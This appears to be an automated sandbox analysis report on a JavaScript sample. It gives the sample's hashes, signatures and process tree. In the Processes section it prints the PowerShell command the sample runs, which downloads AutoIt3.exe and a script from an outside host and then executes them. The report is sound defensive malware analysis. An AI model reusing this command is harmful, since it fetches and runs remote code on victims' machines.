Analysis
-
max time kernel
121s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20231025-en -
resource tags
arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system -
submitted
07-11-2023 14:40
Static task
static1
Behavioral task
behavioral1
Sample
5f475d11b0914f11.js
Resource
win7-20231025-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
5f475d11b0914f11.js
Resource
win10v2004-20231020-en
10 signatures
150 seconds
General
-
Target
5f475d11b0914f11.js
-
Size
254KB
-
MD5
40e1292e9b1fe1a88b32b99e3ca9f72f
-
SHA1
5a0403673919d994412f4635998e8f8a3ac315a8
-
SHA256
00f25f4e27938650e42747fc5b85d87e040d8c79db82c72ccf05ca03c8d32771
-
SHA512
3ed3109bd47fe056f01a5c6cb912addf2a90e9e55e1c412d3641d42335f80058594e2294b5c4cb6fd6d728add7a03115807595c87a4ff32149e93624dbad8e67
-
SSDEEP
6144:Ne7hgXeerjqlI2Iro+qg3e7hgXeerjqlI2Iro+8:NIhgSlI23tKIhgSlI23V
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2132 powershell.exe 2132 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2132 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 524 wrote to memory of 2132 524 wscript.exe 29 PID 524 wrote to memory of 2132 524 wscript.exe 29 PID 524 wrote to memory of 2132 524 wscript.exe 29
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\5f475d11b0914f11.js1⤵
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://8sjimonstersboonkonline.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://8sjimonstersboonkonline.com:2351/msiasfgadcz' -OutFile 'asfgadcz.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'asfgadcz.au3'"; Stop-Process -Name "WScript"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132
-